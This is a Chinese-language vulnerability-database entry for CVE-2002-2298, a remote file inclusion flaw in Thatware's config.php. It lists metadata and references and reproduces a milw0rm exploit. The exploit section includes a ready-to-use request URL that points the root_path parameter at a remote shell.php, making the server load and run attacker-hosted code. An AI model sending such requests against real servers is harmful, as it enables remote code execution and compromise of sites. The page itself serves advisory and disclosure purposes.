Thatware漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110802 漏洞类型 代码注入
发布时间 2006-08-10 更新时间 2006-08-10
CVE编号 CVE-2002-2298 CNNVD-ID CNNVD-200212-151
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2166
https://www.securityfocus.com/bid/86674
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-151
|漏洞详情
Thatware0.3到0.5.3版本的config.php的PHP远程文件包含漏洞。远程攻击者借助root_path参数执行任意PHP代码。
|漏洞EXP
Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]
|受影响的产品
Atthat.Com Thatware 0.5.3
|参考资料

来源:XF
名称:thatware-php-file-include(10758)
链接:http://xforce.iss.net/xforce/xfdb/10758
来源:SECTRACK
名称:1005733
链接:http://securitytracker.com/id?1005733
来源:BUGTRAQ
名称:20021201Thatware(PHP)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0000.html